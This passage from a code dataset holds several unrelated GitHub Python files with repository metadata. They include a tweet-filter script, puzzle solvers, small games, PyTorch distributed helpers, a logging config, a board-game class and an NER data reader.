'Lucio Gutierrez', 'Andrés Aráuz', 'Andres Arauz', 'Guillermo Celi', 'Yaku Pérez', 'Yaku Perez', 'César Montúfar', 'Cesar Montufar', 'Isidro Romero', 'Gerson Almeida', 'Ximena Peña', 'Paúl Carrasco', 'Paul Carrasco', 'Esteban Quirola', 'Miguel Salem Kronfle', 'Cristina Reyes', 'Xavier Hervas', 'José Freile', 'Juan Fernando Velasco', 'Washington Pesántez', 'Elecciones 
Ecuador','Creo', 'Justicia Social','Democracia Si', 'Partido Sociedad Patriótica','Centro Democrático','Unión por la esperanza','Union por la esperanza','SUMA','suma','Pachakutik','Concertación','avanza','Ecuatoriano Unido','Alianza país','Juntos podemos','Libertad es pueblo','Fuerza Ecuador','Social Cristiano','Izquierda Democratica','Izquierda Democrática','Construye','Unión Ecuatoriana','Union Ecuatoriana','Elecciones2020'])\r\n\r\n'''===============LOCATIONS==============''' \r\n#Manta\r\ntwitterStream.filter(locations=[-92.21,-5.02,-75.19,1.95]) \r\n","repo_name":"Cristiangpbf/Proyecto_Final_BDDM","sub_path":"Scripts de recolección de datos/tweets_ecuador.py","file_name":"tweets_ecuador.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053112925","text":"import sys\ninput = sys.stdin.readline\n\ndef back(idx):\n global ans\n if len(stack) == 11:\n ans = max(ans, sum(stack))\n return\n\n for i in range(11):\n if scores[idx][i] != 0 and not visited[i]:\n visited[i] = 1\n stack.append(scores[idx][i])\n back(idx+1)\n stack.pop()\n visited[i] = 0\n\nT = int(input())\nfor _ in range(T):\n scores = [list(map(int, input().split())) for _ in range(11)]\n ans = 0\n stack = []\n visited = [0] * 11\n back(0)\n print(ans)\n","repo_name":"Sangmin627/AlgoStudy2023","sub_path":"상진/Baekjoon/Backtracking/BOJ3980.py","file_name":"BOJ3980.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37421513404","text":"# config.py\n# Simple config class used for initializing a QuartzNet model.\n# Note:\n# There are 4 Convolutional sections C, 5 Blocks B, each block B\n# with 5 Time Separable 1D Convolutional sections S. 
The blocks B are\n# repeated R times.\n# Model name = (B x R) X S\n# B = 5, R = {1, 2, 3} (aka block_repeat), S = 5 (module_repeat)\n# Tensorflow 2.4\n# Python 3.7\n# Windows/MacOS/Linux\n\n\nimport os\nimport json\n\n\nclass Config:\n\tdef __init__(self, block_repeat=3, module_repeat=5):\n\t\t# Model | block_repeat | module_repeat\n\t\t# 5x5 1 5\n\t\t# 10x5 2 5\n\t\t# 15x5 3 5\n\t\tself.block_repeat = block_repeat\n\t\tself.module_repeat = module_repeat\n\n\n\tdef save_config(self, path_dir):\n\t\tif not os.path.exists(path_dir):\n\t\t\tos.makedirs(path_dir, exist_ok=True)\n\t\twith open(os.path.join(path_dir, \"config.json\"), \"w+\") as f:\n\t\t\tdata = {\n\t\t\t\t\"block_repeat\": self.block_repeat,\n\t\t\t\t\"module_repeat\": self.module_repeat,\n\t\t\t}\n\t\t\tjson.dump(data, f, indent=4)\n\n\n\tdef load_config(self, path_dir):\n\t\tconfig_file = os.path.join(path_dir, \"config.json\")\n\t\tif not os.path.exists(path_dir):\n\t\t\tprint(f\"Error: Could not locate path: {path_dir}\")\n\t\telif not os.path.exists(config_file):\n\t\t\tprint(f\"Error: Could not locate config file: {config_file}\")\n\t\twith open(os.path.join(path_dir, \"config.json\"), \"w+\") as f:\n\t\t\tdata = json.load(f)\n\t\tself.block_repeat = data[\"block_repeat\"]\n\t\tself.module_repeat = data[\"module_repeat\"]","repo_name":"dmmagdal/QuartzNet_ASR","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71231946643","text":"import torch\n\n\n# The following code is borrowed from Ross Wightman implementation at\n# https://github.com/mlfoundations/open_clip/blob/a5ba05f7cab5ddab7c9967bfb8bbef303be6f3aa/src/open_clip/loss.py\n\n# The code is borrowed for the purpose of testing the correctness of the Sigmoid Loss\n\n\ndef neighbour_exchange(from_rank, to_rank, tensor, group=None):\n tensor_recv = torch.zeros_like(tensor)\n send_op = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor,\n to_rank,\n group=group,\n )\n recv_op = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_recv,\n from_rank,\n group=group,\n )\n reqs = torch.distributed.batch_isend_irecv([send_op, recv_op])\n for req in reqs:\n req.wait()\n return tensor_recv\n\n\ndef neighbour_exchange_bidir(left_rank, right_rank, tensor_to_left, tensor_to_right, group=None):\n tensor_from_left = torch.zeros_like(tensor_to_right)\n tensor_from_right = torch.zeros_like(tensor_to_left)\n send_op_left = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor_to_left,\n left_rank,\n group=group,\n )\n send_op_right = torch.distributed.P2POp(\n torch.distributed.isend,\n tensor_to_right,\n right_rank,\n group=group,\n )\n recv_op_left = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_from_left,\n left_rank,\n group=group,\n )\n recv_op_right = torch.distributed.P2POp(\n torch.distributed.irecv,\n tensor_from_right,\n right_rank,\n group=group,\n )\n reqs = torch.distributed.batch_isend_irecv(\n [send_op_right, send_op_left, recv_op_right, recv_op_left]\n )\n for req in reqs:\n req.wait()\n return tensor_from_right, tensor_from_left\n\n\nclass NeighbourExchange(torch.autograd.Function):\n @staticmethod\n def forward(ctx, from_rank, to_rank, group, tensor):\n ctx.group = group\n ctx.from_rank = from_rank\n ctx.to_rank = to_rank\n return neighbour_exchange(from_rank, to_rank, tensor, group=group)\n\n @staticmethod\n def backward(ctx, grad_output):\n return (None, None, None) + (\n 
NeighbourExchange.apply(ctx.to_rank, ctx.from_rank, ctx.group, grad_output),\n )\n\n\ndef neighbour_exchange_with_grad(from_rank, to_rank, tensor, group=None):\n return NeighbourExchange.apply(from_rank, to_rank, group, tensor)\n\n\nclass NeighbourExchangeBidir(torch.autograd.Function):\n @staticmethod\n def forward(ctx, left_rank, right_rank, group, tensor_to_left, tensor_to_right):\n ctx.group = group\n ctx.left_rank = left_rank\n ctx.right_rank = right_rank\n return neighbour_exchange_bidir(\n left_rank, right_rank, tensor_to_left, tensor_to_right, group=group\n )\n\n @staticmethod\n def backward(ctx, *grad_outputs):\n return (None, None, None) + NeighbourExchangeBidir.apply(\n ctx.right_rank, ctx.left_rank, ctx.group, *grad_outputs\n )\n\n\ndef neighbour_exchange_bidir_with_grad(\n left_rank, right_rank, tensor_to_left, tensor_to_right, group=None\n):\n return NeighbourExchangeBidir.apply(\n left_rank, right_rank, group, tensor_to_left, tensor_to_right\n )\n","repo_name":"ahmdtaha/distributed_sigmoid_loss","sub_path":"distributed_utils.py","file_name":"distributed_utils.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"29073353868","text":"number = 98\nguess = input(\"你猜是什么数:\")\nguess = int(guess)\n\nif guess == number:\n print(\"你猜中了!厉害!\")\nelse:\n print(\"你没有猜中。\")\n\n\n#扩展功能:\n# 若玩家没有猜中,给出“你猜的数大了”或“你猜的数小了”的输出。","repo_name":"yeahatgithub/LightComputerGames","sub_path":"guess_number/guess_once.py","file_name":"guess_once.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7891685925","text":"import decimal\nimport logging\nimport logging.config\nimport uuid\nfrom datetime import date, datetime\nfrom typing import Any\n\nfrom pythonjsonlogger import jsonlogger\nimport simplejson\n\nfrom .types import Config\n\n__all__ = [\"configure_logging\", \"logger\"]\nlogger = logging.getLogger(\"chaosiqagent\")\n\n\ndef encoder(o: Any) -> str: # pragma: no cover\n \"\"\"\n Perform some additional encoding for types JSON doesn't support natively.\n We don't try to respect any ECMA specification here as we want to retain\n as much information as we can.\n \"\"\"\n if isinstance(o, (date, datetime)):\n # we do not meddle with the timezone and assume the date was stored\n # with the right information of timezone as +-HH:MM\n return o.isoformat()\n elif isinstance(o, decimal.Decimal):\n return str(o)\n elif isinstance(o, uuid.UUID):\n return str(o)\n\n raise TypeError(\n \"Object of type '{}' is not JSON serializable\".format(type(o)))\n\n\ndef configure_logging(config: Config) -> None:\n \"\"\"\n Configure the application's logger.\n\n Look into the configuration for two options:\n\n * DEBUG: to enable `\"DEBUG\"` level, `\"INFO\"` otherwise\n * LOG_FORMAT: to define which format should be used to log `\"plain\"` or\n `\"structured\"` for json logging\n \"\"\"\n verbose = config.debug\n log_format = config.log_format\n level = logging.DEBUG if verbose else logging.INFO\n\n struct_fmt = \"%(process) %(asctime) %(levelname) %(module) %(lineno) \" \\\n \"%(message) %(trace)\"\n cfg = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"plain\": {\n 'format': '%(asctime)s %(levelname)s %(name)s %(message)s'\n },\n \"structured\": {\n \"()\": jsonlogger.JsonFormatter,\n \"fmt\": struct_fmt,\n \"json_default\": encoder,\n \"json_serializer\": simplejson.dumps,\n 
\"json_indent\": None,\n \"timestamp\": True\n }\n },\n \"handlers\": {\n \"default\": {\n \"level\": level,\n \"class\": \"logging.StreamHandler\",\n \"formatter\": log_format,\n }\n },\n \"loggers\": {\n \"chaosiqagent\": {\n \"handlers\": [\"default\"],\n \"level\": level,\n \"propagate\": False\n }\n }\n }\n\n logging.config.dictConfig(cfg)\n","repo_name":"chaosiq/chaosiq-agent","sub_path":"chaosiqagent/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40421807591","text":"import networkx as nx \nimport logging\nimport os\nimport json\nimport random\nfrom components import DATA_DIR\nlogger = logging.getLogger('board')\nlogger.setLevel(logging.INFO)\nfh = logging.FileHandler('output.log')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(message)s')\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nEDGELIST = os.path.join(DATA_DIR, \"map.edgelist\")\nCITYCOLORS = os.path.join(DATA_DIR, \"city_colors.json\")\nclass Board:\n\n\tdef __init__(self, settings, phase=1):\n\t\t'''\n\t\tedgelist: path to file where map is stored\n\t\tphase: current phase of the game; should always be 1\n\t\t'''\n\t\tself.board = nx.read_weighted_edgelist(EDGELIST)\n\t\tinvalid_cities = self._random_choose_play_area(settings['num_players'])\n\t\tself._strip_cities(invalid_cities)\n\t\tself._initialize_costs()\n\t\tself.phase = phase\n\n\tdef _initialize_costs(self):\n\t\tfor city in self.board.nodes():\n\t\t\tself.board.node[city][\"cost\"] = 10\n\t\t\tself.board.node[city][\"slots\"] = []\n\n\tdef _strip_cities(self, invalid_cities):\n\t\tfor city in invalid_cities:\n\t\t\tself.board.remove_node(city)\n\n\tdef _random_choose_play_area(self, num_players):\n\t\t'''\n\t\tbased on the number of players registered, we chose a \n\t\tsubset of cities to play with. The regions must be contiguous! 
\n\t\tReturns list of cities that we later remove from the board.\n\t\t'''\n\t\tnum_areas = [0, 0, 0, 3, 4, 5, 5][num_players]\n\t\tif num_areas == 5:\n\t\t\t# if we need to pick 5, we can also just remove a random 1\n\t\t\tcolors = ['brown', 'red', 'purple', 'blue', 'yellow', 'green']\n\t\t\tvalid_colors = colors.remove(random.choice(colors))\n\t\telse:\n\t\t\teur_connections = [('brown', 'red'), ('brown', 'purple'), ('brown', 'yellow'), ('brown', 'green'), ('brown', 'orange'), ('purple', 'red'), ('red', 'yellow'), ('yellow', 'blue'), ('yellow', 'green'), ('blue', 'green'), ('orange', 'green')]\n\t\t\tvalid_colors = list(random.choice(eur_connections))\n\t\t\twhile len(valid_colors) < num_areas:\n\t\t\t\t# get connections with exactly 1 already chosen color\n\t\t\t\tcandidates = [link for link in eur_connections if (bool(link[0] in valid_colors) ^ bool(link[1] in valid_colors))]\n\t\t\t\tlink = random.choice(candidates)\n\t\t\t\tif link[0] in valid_colors:\n\t\t\t\t\tvalid_colors.append(link[1])\n\t\t\t\telse:\n\t\t\t\t\tvalid_colors.append(link[0])\n\t\twith open(CITYCOLORS, 'r') as colorfile:\n\t\t\tcity_colors = json.load(colorfile)\n\t\tinvalid_cities = []\n\t\tfor color in city_colors:\n\t\t\tif color not in valid_colors:\n\t\t\t\tinvalid_cities += city_colors[color]\n\t\treturn invalid_cities\n\n\tdef cities_owned_by_player(self, player_id):\n\t\t'''\n\t\treturns a list of cities owned by the player\n\t\t'''\n\t\tcities = [city for city in self.board.nodes() if player_id in self.board.node[city][\"slots\"]]\n\t\treturn cities\n\n\tdef num_cities(self, player_id):\n\t\t'''\n\t\treturns the number of cities owned by a player\n\t\t'''\n\t\tcities = self.cities_owned_by_player(player_id)\n\t\treturn len(cities)\n\n\tdef update_cost(self, city):\n\t\tpurchased = self.board.node[city]\n\t\tif purchased[\"cost\"] == 10:\n\t\t\tpurchased[\"cost\"] = 15 \n\t\telif purchased[\"cost\"] == 15:\n\t\t\tpurchased[\"cost\"] = 20\n\t\telif purchased[\"cost\"] == 20:\n\t\t\tpurchased[\"cost\"] = -1 \n\n\tdef player_purchase(self, player_id, path):\n\t\t'''\n\t\tallows the player to purchase a slot in the city designated\n\t\t'''\n\t\tcity_name = path[-1]\n\t\tpurchased = self.board.node[city_name]\n\t\tpath_cost = self.cost_of_path(path)\n\t\tcity_cost = self.cost_of_city(city_name)\n\t\tpurchased[\"slots\"].append(player_id)\n\t\tself.update_cost(city_name)\n\t\treturn path_cost + city_cost\n\n\tdef player_in_city(self, player_id, city):\n\t\t'''\n\t\tReturns True if player_id has a generator in city\n\t\t'''\n\t\tif city not in self.board.nodes():\n\t\t\treturn False, \"{} not a valid city name\".format(city)\n\t\tslots = self.board.node[city][\"slots\"]\n\t\tif player_id in slots:\n\t\t\treturn True, \"{} in {}\".format(player_id, city)\n\t\telse:\n\t\t\treturn False, \"{} not in {}\".format(player_id, city)\n\n\tdef can_build(self, player_id, city):\n\t\t'''\n\t\tDetermines if player_id can build in city\n\t\t'''\n\t\tif city not in self.board.nodes():\n\t\t\treturn False, \"{} not valid city name\".format(city)\n\t\tslots = self.board.node[city][\"slots\"]\n\t\tif len(slots) >= self.phase:\n\t\t\treturn False, \"{} already has {} generators built\".format(city, len(slots))\n\t\tif player_id in slots:\n\t\t\treturn False, \"{} has already built in {}\".format(player_id, city) \n\t\treturn True, \"{} can build in {}\".format(player_id, city)\n\n\tdef cost_of_city(self, city):\n\t\tif city not in self.board.nodes():\n\t\t\tlogger.info(\"{} not valid city name\".format(city))\n\t\t\treturn -1 
\n\t\treturn self.board.node[city][\"cost\"]\n\n\tdef cost_of_path(self, path):\n\t\t'''\n\t\tgiven a list of city names returns the cost to travel\n\t\tif the path is invalid, returns -1\n\t\t'''\n\t\ttotal_cost = 0\n\t\tfor step in range(len(path) - 1):\n\t\t\tif path[step] not in self.board.nodes():\n\t\t\t\tlogger.info(\"{} not valid city\".format(path[step]))\n\t\t\t\treturn -1\n\t\t\tif path[step+1] in self.board.neighbors(path[step]):\n\t\t\t\t# add cost\n\t\t\t\tcost = self.board[path[step]][path[step+1]]['weight']\n\t\t\t\ttotal_cost += cost\n\t\t\telse:\n\t\t\t\tlogger.info(\"{} and {} are not connected!\".format(path[step], path[step+1]))\n\t\t\t\treturn -1\n\t\treturn total_cost\n","repo_name":"kendlera/pg-server","sub_path":"components/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12642419605","text":"# -*- coding: utf-8 -*-\n\nimport random\n\n\ndef get_random_number():\n # Helper Function - 지우지 말 것\n # 100부터 999까지 수를 램덤하게 반환함\n return random.randrange(100, 1000)\n\n\ndef is_digit(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # Output:\n # - user_input_number가 정수로 변환 가능할 경우는 True,\n # 그렇지 않을 경우는 False\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_digit(\"551\")\n # True\n # >>> bg.is_digit(\"103943\")\n # True\n # >>> bg.is_digit(\"472\")\n # True\n # >>> bg.is_digit(\"1032.203\")\n # False\n # >>> bg.is_digit(\"abc\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n try:\n int(user_input_number)\n result = True\n except:\n result = False\n\n # ==================================\n return result\n\n\ndef is_between_100_and_999(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # 입력된 값은 숫자형태의 문자열 값임이 보장된다.\n # Output:\n # - user_input_number가 정수로 변환하여 100이상 1000미만일 경우 True,\n # 그렇지 않을 경우는 False\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_between_100_and_999(\"551\")\n # True\n # >>> bg.is_between_100_and_999(\"103943\")\n # False\n # >>> bg.is_between_100_and_999(\"472\")\n # True\n # >>> bg.is_between_100_and_999(\"0\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n result = int(user_input_number) >= 100 and int(user_input_number) <= 999\n\n # ==================================\n return result\n\n\ndef is_duplicated_number(three_digit):\n # '''\n # Input:\n # - three_digit : 문자열로 된 세자리 양의 정수 값\n # 문자열로 된 세자리 양의 정수값의 입력이 보장된다.\n # Output:\n # - three_digit 정수로 변환하였을 경우 중복되는 수가 있으면 True,\n # 그렇지 않을 경우는 False\n # ex) 117 - True, 123 - False, 103 - False, 113 - True\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_duplicated_number(\"551\")\n # True\n # >>> bg.is_duplicated_number(\"402\")\n # False\n # >>> bg.is_duplicated_number(\"472\")\n # False\n # >>> bg.is_duplicated_number(\"100\")\n # True\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n # Hint - Len과 Set을 써서 할 수 있음, 중복되는 값의 str 길이는 1 또는 2\n\n result = len(set(three_digit)) != 3\n # ==================================\n return result\n\n\ndef is_validated_number(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # Output:\n # - user_input_number 값이 아래 조건이면 True, 그렇지 않으면 False를 반환\n # 1) 숫자형 문자열이며, 2) 100이상 1000미만이며, 3) 중복되는 숫자가 없을 경우\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_validated_number(\"amvd\")\n # False\n # 
>>> bg.is_validated_number(\"402\")\n # True\n # >>> bg.is_validated_number(\"472\")\n # True\n # >>> bg.is_validated_number(\"100\")\n # False\n # >>> bg.is_validated_number(\"1000\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n\n result = is_digit(user_input_number) and is_between_100_and_999(\n user_input_number) and not is_duplicated_number(user_input_number)\n\n # ==================================\n return result\n\n\ndef get_not_duplicated_three_digit_number():\n # '''\n # Input:\n # - None : 입력값이 없음\n # Output:\n # - 중복되는 숫자가 없는 3자리 정수값을 램덤하게 생성하여 반환함\n # 정수값으로 문자열이 아님\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.get_not_duplicated_three_digit_number()\n # 125\n # >>> bg.get_not_duplicated_three_digit_number()\n # 634\n # >>> bg.get_not_duplicated_three_digit_number()\n # 583\n # >>> bg.get_not_duplicated_three_digit_number()\n # 381\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n # get_random_number() 함수를 사용하여 random number 생��\n result = 0\n random = \"\"\n while len(random) != 3:\n result = get_random_number()\n random = \"\".join(set(str(result)))\n\n # ==================================\n return result\n\n\ndef get_strikes_or_ball(user_input_number, random_number):\n # '''\n # Input:\n # - user_input_number : 문자열값으로 사용자가 입력하는 세자리 정수\n # - random_number : 문자열값으로 컴퓨터가 자동으로 생성된 숫자\n # Output:\n # - [strikes, ball] : 규칙에 따라 정수형 값인 strikes와 ball이 반환됨\n # 변환 규칙은 아래와 같음\n # - 사용자가 입력한 숫자와 컴퓨터가 생성한 숫자의\n # 한 숫자와 자릿수가 모두 일치하면 1 Strike\n # - 자릿수는 다르나 입력한 한 숫자가 존재하면 1 Ball\n # - 세자리 숫자를 정확히 입력하면 3 Strike\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.get_strikes_or_ball(\"123\", \"472\")\n # [0, 1]\n # >>> bg.get_strikes_or_ball(\"547\", \"472\")\n # [0, 2]\n # >>> bg.get_strikes_or_ball(\"247\", \"472\")\n # [0, 3]\n # >>> bg.get_strikes_or_ball(\"742\", \"472\")\n # [1, 2]\n # >>> bg.get_strikes_or_ball(\"472\", \"472\")\n # [3, 0]\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n user_input_number = [x for x in str(user_input_number)]\n random_number = [x for x in str(random_number)]\n strike = 0\n ball = 0\n\n for user_input_index, user_input in enumerate(user_input_number, start=1):\n for random_index, random in enumerate(random_number, start=1):\n if user_input == random and user_input_index == random_index:\n strike += 1\n break\n elif user_input == random and user_input_index != random_index:\n ball += 1\n break\n\n result = [strike, ball]\n # ==================================\n return result\n\n\ndef is_yes(one_more_input):\n # '''\n # Input:\n # - one_more_input : 문자열값으로 사용자가 입력하는 문자\n # Output:\n # - 입력한 값이 대소문자 구분없이 \"Y\" 또는 \"YES\"일 경우 True,\n # 그렇지 않을 경우 False를 반환함\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_yes(\"Y\")\n # True\n # >>> bg.is_yes(\"y\")\n # True\n # >>> bg.is_yes(\"Yes\")\n # True\n # >>> bg.is_yes(\"YES\")\n # True\n # >>> bg.is_yes(\"abc\")\n # False\n # >>> bg.is_yes(\"213\")\n # False\n # >>> bg.is_yes(\"4562\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n lowercased_input = one_more_input.lower()\n result = lowercased_input == \"y\" or lowercased_input == \"yes\"\n # ==================================\n return result\n\n\ndef is_no(one_more_input):\n # '''\n # Input:\n # - one_more_input : 문자열값으로 사용자가 입력하는 문자\n # Output:\n # - 입력한 값이 대소문자 구분없이 \"N\" 또는 \"NO\"일 경우 True,\n # 그렇지 않을 경우 False를 반환함\n # Examples:\n # >>> import 
baseball_game as bg\n # >>> bg.is_no(\"Y\")\n # False\n # >>> bg.is_no(\"b\")\n # False\n # >>> bg.is_no(\"n\")\n # True\n # >>> bg.is_no(\"NO\")\n # True\n # >>> bg.is_no(\"nO\")\n # True\n # >>> bg.is_no(\"1234\")\n # False\n # >>> bg.is_no(\"yes\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n\n lowercased_input = one_more_input.lower()\n result = lowercased_input == \"n\" or lowercased_input == \"no\"\n # ==================================\n return result\n\n\ndef main():\n print(\"Play Baseball\")\n exit = False\n user_input = 0\n\n while exit is False:\n random_number = str(get_not_duplicated_three_digit_number())\n print(\"Random Number is : \", random_number)\n isCorrect = False\n # ===Modify codes below=============\n while isCorrect is False:\n user_input = input('Input guess number : ')\n\n if user_input == \"0\":\n exit = True\n break\n\n if not is_validated_number(user_input):\n print(\"Wrong Input, Input again\")\n continue\n\n result = get_strikes_or_ball(user_input, random_number)\n strike = result[0]\n ball = result[1]\n print(\"Strikes : {0} , Balls : {1}\".format(strike, ball))\n\n if strike == 3:\n isCorrect = True\n while True:\n input_continue = input('You win, one more(Y/N) ?')\n if is_yes(input_continue):\n break\n elif is_no(input_continue):\n exit = True\n break\n else:\n print(\"Wrong Input, Input again\")\n # ==================================\n\n print(\"Thank you for using this program\")\n print(\"End of the Game\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AutumnSky/Inflearn-start_python_for_datascience","sub_path":"lab_7/linux_mac/baseball_game.py","file_name":"baseball_game.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40974642940","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 21 20:06:03 2018\r\n\r\n@author: zabiulla.khan\r\n\"\"\"\r\n\r\n\"\"\"\r\nWrite a program which will find all such numbers which are divisible by 7 but are not a\r\nmultiple of 5, between 2000 and 3200 (both included). 
The numbers obtained should be\r\nprinted in a comma-separated sequence on a single line.\r\n\"\"\"\r\n\r\n# Create a list with a range between 2000 and 3200\r\nlist1 = list(range(2000,3200))\r\n\r\n# initialize the iterator to 0\r\ni=0\r\n\r\n'''create a new empty list to store all the numbers within range that \r\nare divisble by 7 and not multiples of 5'''\r\nlist2 = []\r\n\r\n# Loop all the items in initial defined list range\r\nfor i in list1:\r\n \r\n #identify all the numbers divisible by 7 within range defined above\r\n div7 = i%7\r\n \r\n # identify all numbers which are multiples of 5 within the range defined above\r\n mul5 = i%5\r\n \r\n # Check if numbers are divisble by 7 and are not multiples of 5\r\n if div7 == 0 and mul5 != 0:\r\n # store/append all the numbers identified divisble by 7 and not multiples of 5\r\n list2.append(str(i))\r\n#Include a comma seperator \r\nprint(','.join(list2))\r\n\r\n \r\n","repo_name":"zabiullakhangithub/Python_Session1_Assignment_1.2","sub_path":"Assignment 1.2.py","file_name":"Assignment 1.2.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12634309340","text":"from dataclasses import dataclass, field\nimport heapq\nfrom itertools import product\n\nfrom more_itertools import take\nimport numpy as np\n\n\n@dataclass(order=True)\nclass Coord:\n dist: int\n coord: tuple[int, int]=field(compare=False)\n max_size: tuple[int, int]=field(compare=False)\n\n def neighbors(self):\n return [\n (self.coord[0]+i, self.coord[1]+j)\n for i, j in [(1, 0), (0, 1), (-1, 0), (0, -1)]\n if 0 <= self.coord[0] + i < self.max_size[0]\n and 0 <= self.coord[1] + j < self.max_size[1]\n ]\n\n\ndef a(grid):\n return do_dijkstra_old(grid)\n\n\ndef b(grid):\n return do_dijkstra_old(extend_grid(grid))\n\n\ndef extend_grid(grid):\n assert grid.shape[0] == grid.shape[1] # assumes square grid\n addition = np.repeat(np.arange(5), repeats=grid.shape[0]).reshape(-1, 1)\n grid = np.tile(grid, (5, 5))\n grid += addition + addition.T\n where_wrap = grid >= 10\n grid[where_wrap] = (grid[where_wrap] + 1) % 10\n return grid\n\n\ndef do_dijkstra_old(grid):\n heap = []\n coord_grid = {}\n nrows, ncols = grid.shape\n for coord in product(range(nrows), range(ncols)):\n loc = Coord(np.inf, coord, max_size=grid.shape)\n heap.append(loc)\n coord_grid[coord] = loc\n\n goal = heap[-1].coord\n coord_grid[(0,0)].dist = 0\n cur = heapq.heappop(heap)\n visited = set()\n\n while heap:\n if cur.coord is None:\n cur = heapq.heappop(heap)\n continue\n for coord in cur.neighbors():\n if coord in visited:\n continue\n\n entry = coord_grid[coord]\n new_dist = grid[coord] + cur.dist\n if new_dist < entry.dist:\n new_entry = Coord(new_dist, entry.coord, max_size=entry.max_size)\n coord_grid[coord] = new_entry\n entry.coord = None\n heapq.heappush(heap, new_entry)\n\n visited.add(cur.coord)\n cur = heapq.heappop(heap)\n\n if coord_grid[goal].dist < cur.dist:\n break\n\n return coord_grid[goal].dist\n\n\ndef if_only_down_or_right(grid):\n total_risk_grid = np.copy(grid)\n rows, cols = grid.shape\n coords = product(range(rows-1, -1, -1), range(cols-1, -1, -1))\n take(1, coords) # omit bottom-right corner\n for i, j in coords:\n choices = []\n if i != rows-1:\n choices.append(total_risk_grid[i+1, j])\n if j != cols-1:\n choices.append(total_risk_grid[i, j+1])\n total_risk_grid[i,j] += min(choices)\n return total_risk_grid[0,0] - grid[0,0]\n\n\nif __name__ == '__main__':\n files = [\n 'input15-test1.txt',\n 
# 'input15-test2.txt',\n # 'input15-test3.txt',\n 'input15.txt',\n ]\n for filename in files:\n print(filename)\n with open(filename) as f:\n lines = f.read().splitlines() # multi-line file\n grid = np.array([list(map(int, line)) for line in lines])\n\n print(f'A: {a(grid)}')\n print(f'B: {b(grid)}')\n","repo_name":"sjvrijn/AdventofCode","sub_path":"Sander/2021/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17508484270","text":"import re\nfrom collections import defaultdict\n\nimport numpy as np\n\n\ndef iob_to_iob2(tags):\n\tprev = \"O\"\n\tfor i in range(len(tags)):\n\t\ttag = re.sub(r'^B-|^I-', '', tags[i])\n\t\tif tags[i].startswith(\"I-\") and not prev.endswith(\"-\"+tag):\n\t\t\ttags[i] = \"B-\"+tag\n\t\tprev = tags[i]\n\treturn tags\n\n\ndef read_data(file):\n\t''' reading data '''\n\twords = []\n\ttags = []\n\n\toutput = []\n\n\twith open(file, 'r') as data:\n\t\tfor line in data:\n\t\t\tif line.strip():\n\t\t\t\tvals = line.strip().split(\" \")\n\t\t\t\tif vals[0] != \"-DOCSTART-\":\n\t\t\t\t\twords.append(vals[0])\n\t\t\t\t\ttags.append(vals[-1])\n\t\t\telif len(words) > 0:\n\t\t\t\ttags = iob_to_iob2(tags)\n\t\t\t\toutput.append([(word, tag) for word, tag in zip(words, tags)])\n\t\t\t\twords = []\n\t\t\t\ttags = []\n\treturn output\n\ndef lst_to_array(words, tags, max_sent_len):\n\toutput = np.zeros((1, max_sent_len * 2 + 1), np.int32)\n\toutput[0, :len(words)] = words\n\toutput[0, max_sent_len:max_sent_len + len(tags)] = tags\n\toutput[0, -1] = len(words)\n\treturn 